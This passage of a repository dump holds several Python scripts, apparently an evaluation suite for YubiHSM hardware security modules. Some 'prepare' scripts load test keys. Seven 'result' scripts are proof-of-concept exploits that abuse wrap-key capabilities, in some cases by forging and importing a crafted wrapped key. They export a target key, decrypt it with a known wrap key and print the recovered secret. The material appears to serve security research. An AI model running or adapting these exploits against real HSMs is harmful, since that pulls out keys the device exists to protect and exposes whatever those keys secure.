            CAPABILITY.EXPORT_WRAPPED | CAPABILITY.EXPORTABLE_UNDER_WRAP, 16 * b'A')

WrapKey.put(session, 2, "target", 0xffff, CAPABILITY.IMPORT_WRAPPED, ALGORITHM.AES128_CCM_WRAP,
            CAPABILITY.EXPORT_WRAPPED | CAPABILITY.EXPORTABLE_UNDER_WRAP, 16 * b'B')

session.close()
connection.close()


==> evaluation/yubihsm/yubihsmprepare5.py <==
from yubihsm import YubiHsm
from yubihsm.defs import ALGORITHM, CAPABILITY, OBJECT
from yubihsm.objects import WrapKey, HmacKey, OtpAeadKey, AuthenticationKey, AsymmetricKey

connection = YubiHsm.connect()
session = connection.create_session_derived(1, 'password')

for o in session.list_objects():
    info = o.get_info()
    if not (info.id == 1 and info.object_type == OBJECT.AUTHENTICATION_KEY):
        print(info)
        o.delete()

AuthenticationKey.put_derived(session, 2, "testauthkey", 0xffff, CAPABILITY.PUT_WRAP_KEY |
                              CAPABILITY.EXPORT_WRAPPED,
                              CAPABILITY.EXPORTABLE_UNDER_WRAP |
                              CAPABILITY.GENERATE_WRAP_KEY | CAPABILITY.PUT_WRAP_KEY |
                              CAPABILITY.EXPORT_WRAPPED | CAPABILITY.IMPORT_WRAPPED, "password")

HmacKey.put(session, 1, "target", 0xffff, CAPABILITY.EXPORTABLE_UNDER_WRAP, 32 * b'A')

session.close()
connection.close()


==> evaluation/yubihsm/yubihsmprepare6.py <==
from yubihsm import YubiHsm
from yubihsm.defs import ALGORITHM, CAPABILITY, OBJECT
from yubihsm.objects import WrapKey, HmacKey, OtpAeadKey, AuthenticationKey, AsymmetricKey

connection = YubiHsm.connect()
session = connection.create_session_derived(1, 'password')

for o in session.list_objects():
    info = o.get_info()
    if not (info.id == 1 and info.object_type == OBJECT.AUTHENTICATION_KEY):
        print(info)
        o.delete()

AuthenticationKey.put_derived(session, 2, "testauthkey", 0xffff, CAPABILITY.EXPORTABLE_UNDER_WRAP |
                              CAPABILITY.GENERATE_WRAP_KEY | CAPABILITY.PUT_WRAP_KEY |
                              CAPABILITY.EXPORT_WRAPPED | CAPABILITY.IMPORT_WRAPPED,
                              CAPABILITY.EXPORTABLE_UNDER_WRAP |
                              CAPABILITY.GENERATE_WRAP_KEY | CAPABILITY.PUT_WRAP_KEY |
                              CAPABILITY.EXPORT_WRAPPED | CAPABILITY.IMPORT_WRAPPED, "password")

HmacKey.put(session, 1, "target", 0xffff, CAPABILITY.EXPORTABLE_UNDER_WRAP, 32 * b'A')

session.close()
connection.close()


==> evaluation/yubihsm/yubihsmprepare7.py <==
from yubihsm import YubiHsm
from yubihsm.defs import ALGORITHM, CAPABILITY, OBJECT
from yubihsm.objects import WrapKey, HmacKey, OtpAeadKey, AuthenticationKey, AsymmetricKey

connection = YubiHsm.connect()
session = connection.create_session_derived(1, 'password')

for o in session.list_objects():
    info = o.get_info()
    if not (info.id == 1 and info.object_type == OBJECT.AUTHENTICATION_KEY):
        print(info)
        o.delete()

AuthenticationKey.put_derived(session, 2, "testauthkey", 0xffff, CAPABILITY.PUT_WRAP_KEY |
                              CAPABILITY.EXPORT_WRAPPED,
                              CAPABILITY.EXPORTABLE_UNDER_WRAP |
                              CAPABILITY.GENERATE_WRAP_KEY | CAPABILITY.PUT_WRAP_KEY |
                              CAPABILITY.EXPORT_WRAPPED | CAPABILITY.IMPORT_WRAPPED, 'password')

HmacKey.generate(session, 1, "target", 0xffff, CAPABILITY.EXPORTABLE_UNDER_WRAP, ALGORITHM.HMAC_SHA1)

WrapKey.generate(session, 1, "filler", 0xffff, CAPABILITY.IMPORT_WRAPPED, ALGORITHM.AES128_CCM_WRAP,
                 CAPABILITY.EXPORT_WRAPPED | CAPABILITY.EXPORTABLE_UNDER_WRAP)

AsymmetricKey.generate(session, 1, "filler", 0xffff, CAPABILITY.EXPORTABLE_UNDER_WRAP, ALGORITHM.RSA_2048)

OtpAeadKey.generate(session, 1, "filler", 0xffff, CAPABILITY.EXPORTABLE_UNDER_WRAP, ALGORITHM.AES128_YUBICO_OTP, 1)

AuthenticationKey.put_derived(session, 3, "filler", 0xffff,
                              CAPABILITY.EXPORTABLE_UNDER_WRAP | CAPABILITY.EXPORT_WRAPPED,
                              CAPABILITY.EXPORTABLE_UNDER_WRAP | CAPABILITY.EXPORT_WRAPPED, 'password')

AsymmetricKey.generate(session, 2, "filler", 0xffff, CAPABILITY.EXPORTABLE_UNDER_WRAP, ALGORITHM.RSA_2048)

WrapKey.generate(session, 2, "filler", 0xffff, CAPABILITY.EXPORT_WRAPPED, ALGORITHM.AES128_CCM_WRAP,
                 CAPABILITY.EXPORT_WRAPPED | CAPABILITY.EXPORTABLE_UNDER_WRAP)

HmacKey.generate(session, 2, "filler", 0xffff, CAPABILITY.EXPORTABLE_UNDER_WRAP, ALGORITHM.HMAC_SHA1)

OtpAeadKey.generate(session, 2, "filler", 0xffff, CAPABILITY.EXPORTABLE_UNDER_WRAP, ALGORITHM.AES128_YUBICO_OTP, 1)

WrapKey.generate(session, 3, "filler", 0xffff, CAPABILITY.IMPORT_WRAPPED | CAPABILITY.EXPORTABLE_UNDER_WRAP,
                 ALGORITHM.AES128_CCM_WRAP,
                 CAPABILITY.EXPORT_WRAPPED | CAPABILITY.EXPORTABLE_UNDER_WRAP)

WrapKey.generate(session, 4, "filler", 0xffff, CAPABILITY.EXPORT_WRAPPED, ALGORITHM.AES128_CCM_WRAP,
                 CAPABILITY.EXPORT_WRAPPED | CAPABILITY.EXPORTABLE_UNDER_WRAP | CAPABILITY.GENERATE_WRAP_KEY)

session.close()
connection.close()


==> evaluation/yubihsm/yubihsmresult1.py <==
from yubihsm import YubiHsm
from yubihsm.defs import ALGORITHM, CAPABILITY, OBJECT
from yubihsm.objects import WrapKey, HmacKey, OtpAeadKey, AuthenticationKey, AsymmetricKey
import struct
from cryptography.hazmat.primitives.ciphers import Cipher
from cryptography.hazmat.primitives.ciphers.algorithms import AES
from cryptography.hazmat.primitives.ciphers.modes import CTR
from cryptography.hazmat.backends import default_backend
from Crypto.Cipher import AES as AES2

w_id = 1
wrapkey_ids = [1]
new_keys = []


def pick_fresh_id():
    global w_id
    while w_id in wrapkey_ids:
        w_id += 1
    wrapkey_ids.append(w_id)
    return w_id


def pad_key(k, n):
    while len(k) != n:
        k = k + b'\x00'
    return k


def translate_caps(c1, c2, c3, c4, c5):
    c_out = 0
    if c1 == "on":
        c_out = c_out | CAPABILITY.EXPORTABLE_UNDER_WRAP
    if c2 == "on":
        c_out = c_out | CAPABILITY.GENERATE_WRAP_KEY
    if c3 == "on":
        c_out = c_out | CAPABILITY.PUT_WRAP_KEY
    if c4 == "on":
        c_out = c_out | CAPABILITY.EXPORT_WRAPPED
    if c5 == "on":
        c_out = c_out | CAPABILITY.IMPORT_WRAPPED
    return c_out


connection = YubiHsm.connect()
session = connection.create_session_derived(2, 'password')

x1 = 16 * b'B'

x2 = session.list_objects(object_id=2, object_type=OBJECT.AUTHENTICATION_KEY)[0]

x3 = session.list_objects(object_id=1, object_type=OBJECT.OTP_AEAD_KEY)[0]

x4 = session.list_objects(object_id=1, object_type=OBJECT.WRAP_KEY)[0]

# EXPORT WRAPPED
wrapkey = x4
targetkey = x3
x5 = wrapkey.export_wrapped(targetkey)

# DECRYPT WRAP
key = x1
if len(key) > 32:
    key = key[:32]
nonce = x5[:13]
nonce = b'\x01' + nonce + b'\x00\x01'
data = x5[13:-16]
decryptor = Cipher(AES(key), mode=CTR(nonce), backend=default_backend()).decryptor()
x6 = decryptor.update(data)[1:]

# EXTRACT KEY
wrappedkeytype = int(x6[14])
typestring = ''
if wrappedkeytype == 2:
    x7 = x6[66:]
    typestring = 'authkey'
if wrappedkeytype == 3:
    x7 = x6[58:]
    typestring = 'asymkey'
if wrappedkeytype == 4:
    x7 = x6[66:]
    typestring = 'wrapkey'
if wrappedkeytype == 5:
    x7 = x6[58:]
    typestring = 'hmackey'
    x = int(len(x7) / 2)
    x7 = x7[:x]
    i = 0
    actualkey = b''
    while i < x:
        actualkey += bytes([x7[i] ^ 54])
        i += 1
    x7 = actualkey
if wrappedkeytype == 7:
    x7 = x6[62:]
    typestring = 'otpaeadkey'
print('Recovered the ' + typestring + ' with ID ' + str(x6[8:10]) + ':\n' + str(x7))

for key in new_keys:
    try:
        key.delete()
    except:
        print("The Wrap Key with the ID " + str(key.id) + " was created for this POC but can not be deleted. This needs to be done manually.")
session.close()
connection.close()


==> evaluation/yubihsm/yubihsmresult2.py <==
from yubihsm import YubiHsm
from yubihsm.defs import ALGORITHM, CAPABILITY, OBJECT
from yubihsm.objects import WrapKey, HmacKey, OtpAeadKey, AuthenticationKey, AsymmetricKey
import struct
from cryptography.hazmat.primitives.ciphers import Cipher
from cryptography.hazmat.primitives.ciphers.algorithms import AES
from cryptography.hazmat.primitives.ciphers.modes import CTR
from cryptography.hazmat.backends import default_backend
from Crypto.Cipher import AES as AES2

w_id = 1
wrapkey_ids = [1]
new_keys = []


def pick_fresh_id():
    global w_id
    while w_id in wrapkey_ids:
        w_id += 1
    wrapkey_ids.append(w_id)
    return w_id


def pad_key(k, n):
    while len(k) != n:
        k = k + b'\x00'
    return k


def translate_caps(c1, c2, c3, c4, c5):
    c_out = 0
    if c1 == "on":
        c_out = c_out | CAPABILITY.EXPORTABLE_UNDER_WRAP
    if c2 == "on":
        c_out = c_out | CAPABILITY.GENERATE_WRAP_KEY
    if c3 == "on":
        c_out = c_out | CAPABILITY.PUT_WRAP_KEY
    if c4 == "on":
        c_out = c_out | CAPABILITY.EXPORT_WRAPPED
    if c5 == "on":
        c_out = c_out | CAPABILITY.IMPORT_WRAPPED
    return c_out


connection = YubiHsm.connect()
session = connection.create_session_derived(2, 'password')

x1 = 16 * b'B'

x2 = session.list_objects(object_id=2, object_type=OBJECT.AUTHENTICATION_KEY)[0]

x3 = session.list_objects(object_id=1, object_type=OBJECT.OTP_AEAD_KEY)[0]

# CRAFT WRAPFORMAT
new_id = pick_fresh_id()
key = x1
if len(key) == 16:
    size = b'\x00\x18'
    algorithm = b'\x1d'
elif len(key) == 24:
    size = b'\x00\x20'
    algorithm = b'\x29'
elif len(key) == 32:
    size = b'\x00\x28'
    algorithm = b'\x2a'
else:
    key = key[:32]
    size = b'\x00\x28'
    algorithm = b'\x2a'
x4 = struct.pack('>Q', translate_caps("off","off","off","on","off")) + struct.pack(">H", new_id) + size + b'\xff\xff' + b'\x04' + algorithm  + b'\x01' + b'\x11' + 40 * b'\x11' + struct.pack('>Q', translate_caps("on","off","off","on","off")) + key

# CRAFT WRAP
prefix = ""
k = x1
if len(k) == 32:
    prefix = b'\x2a'
elif len(k) == 24:
    prefix = b'\x29'
elif len(k) == 16:
    prefix = b'\x1d'
else:
    prefix = b'\x2a'
    k = k[:32]
encryptor = AES2.new(k, AES2.MODE_CCM, nonce=b'aaabbbcccddde')
c, mac = encryptor.encrypt_and_digest(prefix + x4)
x5 = b'aaabbbcccddde' + c + mac

x6 = session.list_objects(object_id=1, object_type=OBJECT.WRAP_KEY)[0]

# IMPORT WRAPPED
wrapkey = x6
wrap = x5
x7 = wrapkey.import_wrapped(wrap)
new_keys.append(x7)

# EXPORT WRAPPED
wrapkey = x7
targetkey = x3
x8 = wrapkey.export_wrapped(targetkey)

# DECRYPT WRAP
key = x1
if len(key) > 32:
    key = key[:32]
nonce = x8[:13]
nonce = b'\x01' + nonce + b'\x00\x01'
data = x8[13:-16]
decryptor = Cipher(AES(key), mode=CTR(nonce), backend=default_backend()).decryptor()
x9 = decryptor.update(data)[1:]

# EXTRACT KEY
wrappedkeytype = int(x9[14])
typestring = ''
if wrappedkeytype == 2:
    x10 = x9[66:]
    typestring = 'authkey'
if wrappedkeytype == 3:
    x10 = x9[58:]
    typestring = 'asymkey'
if wrappedkeytype == 4:
    x10 = x9[66:]
    typestring = 'wrapkey'
if wrappedkeytype == 5:
    x10 = x9[58:]
    typestring = 'hmackey'
    x = int(len(x10) / 2)
    x10 = x10[:x]
    i = 0
    actualkey = b''
    while i < x:
        actualkey += bytes([x10[i] ^ 54])
        i += 1
    x10 = actualkey
if wrappedkeytype == 7:
    x10 = x9[62:]
    typestring = 'otpaeadkey'
print('Recovered the ' + typestring + ' with ID ' + str(x9[8:10]) + ':\n' + str(x10))

for key in new_keys:
    try:
        key.delete()
    except:
        print("The Wrap Key with the ID " + str(key.id) + " was created for this POC but can not be deleted. This needs to be done manually.")
session.close()
connection.close()


==> evaluation/yubihsm/yubihsmresult3.py <==
from yubihsm import YubiHsm
from yubihsm.defs import ALGORITHM, CAPABILITY, OBJECT
from yubihsm.objects import WrapKey, HmacKey, OtpAeadKey, AuthenticationKey, AsymmetricKey
import struct
from cryptography.hazmat.primitives.ciphers import Cipher
from cryptography.hazmat.primitives.ciphers.algorithms import AES
from cryptography.hazmat.primitives.ciphers.modes import CTR
from cryptography.hazmat.backends import default_backend
from Crypto.Cipher import AES as AES2

w_id = 1
wrapkey_ids = [1,2]
new_keys = []


def pick_fresh_id():
    global w_id
    while w_id in wrapkey_ids:
        w_id += 1
    wrapkey_ids.append(w_id)
    return w_id


def pad_key(k, n):
    while len(k) != n:
        k = k + b'\x00'
    return k


def translate_caps(c1, c2, c3, c4, c5):
    c_out = 0
    if c1 == "on":
        c_out = c_out | CAPABILITY.EXPORTABLE_UNDER_WRAP
    if c2 == "on":
        c_out = c_out | CAPABILITY.GENERATE_WRAP_KEY
    if c3 == "on":
        c_out = c_out | CAPABILITY.PUT_WRAP_KEY
    if c4 == "on":
        c_out = c_out | CAPABILITY.EXPORT_WRAPPED
    if c5 == "on":
        c_out = c_out | CAPABILITY.IMPORT_WRAPPED
    return c_out


connection = YubiHsm.connect()
session = connection.create_session_derived(2, 'password')

x1 = 16 * b'B'

x2 = session.list_objects(object_id=2, object_type=OBJECT.AUTHENTICATION_KEY)[0]

x3 = session.list_objects(object_id=1, object_type=OBJECT.WRAP_KEY)[0]

x4 = session.list_objects(object_id=2, object_type=OBJECT.WRAP_KEY)[0]

# EXPORT WRAPPED
wrapkey = x4
targetkey = x3
x5 = wrapkey.export_wrapped(targetkey)

# DECRYPT WRAP
key = x1
if len(key) > 32:
    key = key[:32]
nonce = x5[:13]
nonce = b'\x01' + nonce + b'\x00\x01'
data = x5[13:-16]
decryptor = Cipher(AES(key), mode=CTR(nonce), backend=default_backend()).decryptor()
x6 = decryptor.update(data)[1:]

# EXTRACT KEY
wrappedkeytype = int(x6[14])
typestring = ''
if wrappedkeytype == 2:
    x7 = x6[66:]
    typestring = 'authkey'
if wrappedkeytype == 3:
    x7 = x6[58:]
    typestring = 'asymkey'
if wrappedkeytype == 4:
    x7 = x6[66:]
    typestring = 'wrapkey'
if wrappedkeytype == 5:
    x7 = x6[58:]
    typestring = 'hmackey'
    x = int(len(x7) / 2)
    x7 = x7[:x]
    i = 0
    actualkey = b''
    while i < x:
        actualkey += bytes([x7[i] ^ 54])
        i += 1
    x7 = actualkey
if wrappedkeytype == 7:
    x7 = x6[62:]
    typestring = 'otpaeadkey'
print('Recovered the ' + typestring + ' with ID ' + str(x6[8:10]) + ':\n' + str(x7))

for key in new_keys:
    try:
        key.delete()
    except:
        print("The Wrap Key with the ID " + str(key.id) + " was created for this POC but can not be deleted. This needs to be done manually.")
session.close()
connection.close()


==> evaluation/yubihsm/yubihsmresult4.py <==
from yubihsm import YubiHsm
from yubihsm.defs import ALGORITHM, CAPABILITY, OBJECT
from yubihsm.objects import WrapKey, HmacKey, OtpAeadKey, AuthenticationKey, AsymmetricKey
import struct
from cryptography.hazmat.primitives.ciphers import Cipher
from cryptography.hazmat.primitives.ciphers.algorithms import AES
from cryptography.hazmat.primitives.ciphers.modes import CTR
from cryptography.hazmat.backends import default_backend
from Crypto.Cipher import AES as AES2

w_id = 1
wrapkey_ids = [1,2]
new_keys = []


def pick_fresh_id():
    global w_id
    while w_id in wrapkey_ids:
        w_id += 1
    wrapkey_ids.append(w_id)
    return w_id


def pad_key(k, n):
    while len(k) != n:
        k = k + b'\x00'
    return k


def translate_caps(c1, c2, c3, c4, c5):
    c_out = 0
    if c1 == "on":
        c_out = c_out | CAPABILITY.EXPORTABLE_UNDER_WRAP
    if c2 == "on":
        c_out = c_out | CAPABILITY.GENERATE_WRAP_KEY
    if c3 == "on":
        c_out = c_out | CAPABILITY.PUT_WRAP_KEY
    if c4 == "on":
        c_out = c_out | CAPABILITY.EXPORT_WRAPPED
    if c5 == "on":
        c_out = c_out | CAPABILITY.IMPORT_WRAPPED
    return c_out


connection = YubiHsm.connect()
session = connection.create_session_derived(2, 'password')

x1 = 16 * b'B'

x2 = session.list_objects(object_id=2, object_type=OBJECT.AUTHENTICATION_KEY)[0]

x3 = session.list_objects(object_id=1, object_type=OBJECT.WRAP_KEY)[0]

# CRAFT WRAPFORMAT
new_id = pick_fresh_id()
key = x1
if len(key) == 16:
    size = b'\x00\x18'
    algorithm = b'\x1d'
elif len(key) == 24:
    size = b'\x00\x20'
    algorithm = b'\x29'
elif len(key) == 32:
    size = b'\x00\x28'
    algorithm = b'\x2a'
else:
    key = key[:32]
    size = b'\x00\x28'
    algorithm = b'\x2a'
x4 = struct.pack('>Q', translate_caps("off","off","off","on","off")) + struct.pack(">H", new_id) + size + b'\xff\xff' + b'\x04' + algorithm  + b'\x01' + b'\x11' + 40 * b'\x11' + struct.pack('>Q', translate_caps("on","off","off","on","off")) + key

# CRAFT WRAP
prefix = ""
k = x1
if len(k) == 32:
    prefix = b'\x2a'
elif len(k) == 24:
    prefix = b'\x29'
elif len(k) == 16:
    prefix = b'\x1d'
else:
    prefix = b'\x2a'
    k = k[:32]
encryptor = AES2.new(k, AES2.MODE_CCM, nonce=b'aaabbbcccddde')
c, mac = encryptor.encrypt_and_digest(prefix + x4)
x5 = b'aaabbbcccddde' + c + mac

x6 = session.list_objects(object_id=2, object_type=OBJECT.WRAP_KEY)[0]

# IMPORT WRAPPED
wrapkey = x6
wrap = x5
x7 = wrapkey.import_wrapped(wrap)
new_keys.append(x7)

# EXPORT WRAPPED
wrapkey = x7
targetkey = x3
x8 = wrapkey.export_wrapped(targetkey)

# DECRYPT WRAP
key = x1
if len(key) > 32:
    key = key[:32]
nonce = x8[:13]
nonce = b'\x01' + nonce + b'\x00\x01'
data = x8[13:-16]
decryptor = Cipher(AES(key), mode=CTR(nonce), backend=default_backend()).decryptor()
x9 = decryptor.update(data)[1:]

# EXTRACT KEY
wrappedkeytype = int(x9[14])
typestring = ''
if wrappedkeytype == 2:
    x10 = x9[66:]
    typestring = 'authkey'
if wrappedkeytype == 3:
    x10 = x9[58:]
    typestring = 'asymkey'
if wrappedkeytype == 4:
    x10 = x9[66:]
    typestring = 'wrapkey'
if wrappedkeytype == 5:
    x10 = x9[58:]
    typestring = 'hmackey'
    x = int(len(x10) / 2)
    x10 = x10[:x]
    i = 0
    actualkey = b''
    while i < x:
        actualkey += bytes([x10[i] ^ 54])
        i += 1
    x10 = actualkey
if wrappedkeytype == 7:
    x10 = x9[62:]
    typestring = 'otpaeadkey'
print('Recovered the ' + typestring + ' with ID ' + str(x9[8:10]) + ':\n' + str(x10))

for key in new_keys:
    try:
        key.delete()
    except:
        print("The Wrap Key with the ID " + str(key.id) + " was created for this POC but can not be deleted. This needs to be done manually.")
session.close()
connection.close()


==> evaluation/yubihsm/yubihsmresult5.py <==
from yubihsm import YubiHsm
from yubihsm.defs import ALGORITHM, CAPABILITY, OBJECT
from yubihsm.objects import WrapKey, HmacKey, OtpAeadKey, AuthenticationKey, AsymmetricKey
import struct
from cryptography.hazmat.primitives.ciphers import Cipher
from cryptography.hazmat.primitives.ciphers.algorithms import AES
from cryptography.hazmat.primitives.ciphers.modes import CTR
from cryptography.hazmat.backends import default_backend
from Crypto.Cipher import AES as AES2

w_id = 1
wrapkey_ids = []
new_keys = []


def pick_fresh_id():
    global w_id
    while w_id in wrapkey_ids:
        w_id += 1
    wrapkey_ids.append(w_id)
    return w_id


def pad_key(k, n):
    while len(k) != n:
        k = k + b'\x00'
    return k


def translate_caps(c1, c2, c3, c4, c5):
    c_out = 0
    if c1 == "on":
        c_out = c_out | CAPABILITY.EXPORTABLE_UNDER_WRAP
    if c2 == "on":
        c_out = c_out | CAPABILITY.GENERATE_WRAP_KEY
    if c3 == "on":
        c_out = c_out | CAPABILITY.PUT_WRAP_KEY
    if c4 == "on":
        c_out = c_out | CAPABILITY.EXPORT_WRAPPED
    if c5 == "on":
        c_out = c_out | CAPABILITY.IMPORT_WRAPPED
    return c_out


connection = YubiHsm.connect()
session = connection.create_session_derived(2, 'password')

x1 = 16 * b'B'

x2 = session.list_objects(object_id=2, object_type=OBJECT.AUTHENTICATION_KEY)[0]

x3 = session.list_objects(object_id=1, object_type=OBJECT.HMAC_KEY)[0]

# PUT WRAPKEY
new_id = pick_fresh_id()
k = x1
if len(k) == 16:
    algo = ALGORITHM.AES128_CCM_WRAP
elif len(k) == 24:
    algo = ALGORITHM.AES192_CCM_WRAP
elif len(k) == 32:
    algo = ALGORITHM.AES256_CCM_WRAP
else:
    algo = ALGORITHM.AES256_CCM_WRAP
    k = k[:32]
x4 = WrapKey.put(session, new_id, "wrapkey", 0xffff, translate_caps("on","on","on","on","on"), algo, translate_caps("on","on","on","on","on"), k)
new_keys.append(x4)

# EXPORT WRAPPED
wrapkey = x4
targetkey = x3
x5 = wrapkey.export_wrapped(targetkey)

# DECRYPT WRAP
key = x1
if len(key) > 32:
    key = key[:32]
nonce = x5[:13]
nonce = b'\x01' + nonce + b'\x00\x01'
data = x5[13:-16]
decryptor = Cipher(AES(key), mode=CTR(nonce), backend=default_backend()).decryptor()
x6 = decryptor.update(data)[1:]

# EXTRACT KEY
wrappedkeytype = int(x6[14])
typestring = ''
if wrappedkeytype == 2:
    x7 = x6[66:]
    typestring = 'authkey'
if wrappedkeytype == 3:
    x7 = x6[58:]
    typestring = 'asymkey'
if wrappedkeytype == 4:
    x7 = x6[66:]
    typestring = 'wrapkey'
if wrappedkeytype == 5:
    x7 = x6[58:]
    typestring = 'hmackey'
    x = int(len(x7) / 2)
    x7 = x7[:x]
    i = 0
    actualkey = b''
    while i < x:
        actualkey += bytes([x7[i] ^ 54])
        i += 1
    x7 = actualkey
if wrappedkeytype == 7:
    x7 = x6[62:]
    typestring = 'otpaeadkey'
print('Recovered the ' + typestring + ' with ID ' + str(x6[8:10]) + ':\n' + str(x7))

for key in new_keys:
    try:
        key.delete()
    except:
        print("The Wrap Key with the ID " + str(key.id) + " was created for this POC but can not be deleted. This needs to be done manually.")
session.close()
connection.close()


==> evaluation/yubihsm/yubihsmresult6.py <==
from yubihsm import YubiHsm
from yubihsm.defs import ALGORITHM, CAPABILITY, OBJECT
from yubihsm.objects import WrapKey, HmacKey, OtpAeadKey, AuthenticationKey, AsymmetricKey
import struct
from cryptography.hazmat.primitives.ciphers import Cipher
from cryptography.hazmat.primitives.ciphers.algorithms import AES
from cryptography.hazmat.primitives.ciphers.modes import CTR
from cryptography.hazmat.backends import default_backend
from Crypto.Cipher import AES as AES2

w_id = 1
wrapkey_ids = []
new_keys = []


def pick_fresh_id():
    global w_id
    while w_id in wrapkey_ids:
        w_id += 1
    wrapkey_ids.append(w_id)
    return w_id


def pad_key(k, n):
    while len(k) != n:
        k = k + b'\x00'
    return k


def translate_caps(c1, c2, c3, c4, c5):
    c_out = 0
    if c1 == "on":
        c_out = c_out | CAPABILITY.EXPORTABLE_UNDER_WRAP
    if c2 == "on":
        c_out = c_out | CAPABILITY.GENERATE_WRAP_KEY
    if c3 == "on":
        c_out = c_out | CAPABILITY.PUT_WRAP_KEY
    if c4 == "on":
        c_out = c_out | CAPABILITY.EXPORT_WRAPPED
    if c5 == "on":
        c_out = c_out | CAPABILITY.IMPORT_WRAPPED
    return c_out


connection = YubiHsm.connect()
session = connection.create_session_derived(2, 'password')

x1 = 16 * b'B'

x2 = session.list_objects(object_id=2, object_type=OBJECT.AUTHENTICATION_KEY)[0]

x3 = session.list_objects(object_id=1, object_type=OBJECT.HMAC_KEY)[0]

# PUT WRAPKEY
new_id = pick_fresh_id()
k = x1
if len(k) == 16:
    algo = ALGORITHM.AES128_CCM_WRAP
elif len(k) == 24:
    algo = ALGORITHM.AES192_CCM_WRAP
elif len(k) == 32:
    algo = ALGORITHM.AES256_CCM_WRAP
else:
    algo = ALGORITHM.AES256_CCM_WRAP
    k = k[:32]
x4 = WrapKey.put(session, new_id, "wrapkey", 0xffff, translate_caps("on","on","on","on","on"), algo, translate_caps("on","on","on","on","on"), k)
new_keys.append(x4)

# EXPORT WRAPPED
wrapkey = x4
targetkey = x3
x5 = wrapkey.export_wrapped(targetkey)

# DECRYPT WRAP
key = x1
if len(key) > 32:
    key = key[:32]
nonce = x5[:13]
nonce = b'\x01' + nonce + b'\x00\x01'
data = x5[13:-16]
decryptor = Cipher(AES(key), mode=CTR(nonce), backend=default_backend()).decryptor()
x6 = decryptor.update(data)[1:]

# EXTRACT KEY
wrappedkeytype = int(x6[14])
typestring = ''
if wrappedkeytype == 2:
    x7 = x6[66:]
    typestring = 'authkey'
if wrappedkeytype == 3:
    x7 = x6[58:]
    typestring = 'asymkey'
if wrappedkeytype == 4:
    x7 = x6[66:]
    typestring = 'wrapkey'
if wrappedkeytype == 5:
    x7 = x6[58:]
    typestring = 'hmackey'
    x = int(len(x7) / 2)
    x7 = x7[:x]
    i = 0
    actualkey = b''
    while i < x:
        actualkey += bytes([x7[i] ^ 54])
        i += 1
    x7 = actualkey
if wrappedkeytype == 7:
    x7 = x6[62:]
    typestring = 'otpaeadkey'
print('Recovered the ' + typestring + ' with ID ' + str(x6[8:10]) + ':\n' + str(x7))

for key in new_keys:
    try:
        key.delete()
    except:
        print("The Wrap Key with the ID " + str(key.id) + " was created for this POC but can not be deleted. This needs to be done manually.")
session.close()
connection.close()


==> evaluation/yubihsm/yubihsmresult7.py <==
from yubihsm import YubiHsm
from yubihsm.defs import ALGORITHM, CAPABILITY, OBJECT
from yubihsm.objects import WrapKey, HmacKey, OtpAeadKey, AuthenticationKey, AsymmetricKey
import struct
from cryptography.hazmat.primitives.ciphers import Cipher
from cryptography.hazmat.primitives.ciphers.algorithms import AES
from cryptography.hazmat.primitives.ciphers.modes import CTR
from cryptography.hazmat.backends import default_backend
from Crypto.Cipher import AES as AES2

w_id = 1
wrapkey_ids = [1,2,3,4]
new_keys = []


def pick_fresh_id():
    global w_id
    while w_id in wrapkey_ids:
        w_id += 1
    wrapkey_ids.append(w_id)
    return w_id


def pad_key(k, n):
    while len(k) != n:
        k = k + b'\x00'
    return k


def translate_caps(c1, c2, c3, c4, c5):
    c_out = 0
    if c1 == "on":
        c_out = c_out | CAPABILITY.EXPORTABLE_UNDER_WRAP
    if c2 == "on":
        c_out = c_out | CAPABILITY.GENERATE_WRAP_KEY
    if c3 == "on":
        c_out = c_out | CAPABILITY.PUT_WRAP_KEY
    if c4 == "on":
        c_out = c_out | CAPABILITY.EXPORT_WRAPPED
    if c5 == "on":
        c_out = c_out | CAPABILITY.IMPORT_WRAPPED
    return c_out


connection = YubiHsm.connect()
session = connection.create_session_derived(2, 'password')

x1 = 16 * b'B'

x2 = session.list_objects(object_id=2, object_type=OBJECT.AUTHENTICATION_KEY)[0]

x3 = session.list_objects(object_id=1, object_type=OBJECT.HMAC_KEY)[0]

# PUT WRAPKEY
new_id = pick_fresh_id()
k = x1
if len(k) == 16:
    algo = ALGORITHM.AES128_CCM_WRAP
elif len(k) == 24:
    algo = ALGORITHM.AES192_CCM_WRAP
elif len(k) == 32:
    algo = ALGORITHM.AES256_CCM_WRAP
else:
    algo = ALGORITHM.AES256_CCM_WRAP
    k = k[:32]
x4 = WrapKey.put(session, new_id, "wrapkey", 0xffff, translate_caps("on","on","on","on","on"), algo, translate_caps("on","on","on","on","on"), k)
new_keys.append(x4)

# EXPORT WRAPPED
wrapkey = x4
targetkey = x3
x5 = wrapkey.export_wrapped(targetkey)

# DECRYPT WRAP
key = x1
if len(key) > 32:
    key = key[:32]
nonce = x5[:13]
nonce = b'\x01' + nonce + b'\x00\x01'
data = x5[13:-16]
decryptor = Cipher(AES(key), mode=CTR(nonce), backend=default_backend()).decryptor()
x6 = decryptor.update(data)[1:]

# EXTRACT KEY
wrappedkeytype = int(x6[14])
typestring = ''
if wrappedkeytype == 2:
    x7 = x6[66:]
    typestring = 'authkey'
if wrappedkeytype == 3:
    x7 = x6[58:]
    typestring = 'asymkey'
if wrappedkeytype == 4:
    x7 = x6[66:]
    typestring = 'wrapkey'
if wrappedkeytype == 5:
    x7 = x6[58:]
    typestring = 'hmackey'
    x = int(len(x7) / 2)
    x7 = x7[:x]
    i = 0
    actualkey = b''
    while i < x:
        actualkey += bytes([x7[i] ^ 54])
        i += 1
    x7 = actualkey
if wrappedkeytype == 7:
    x7 = x6[62:]
    typestring = 'otpaeadkey'
print('Recovered the ' + typestring + ' with ID ' + str(x6[8:10]) + ':\n' + str(x7))

for key in new_keys:
    try:
        key.delete()
    except:
        print("The Wrap Key with the ID " + str(key.id) + " was created for this POC but can not be deleted. This needs to be done manually.")
session.close()
connection.close()

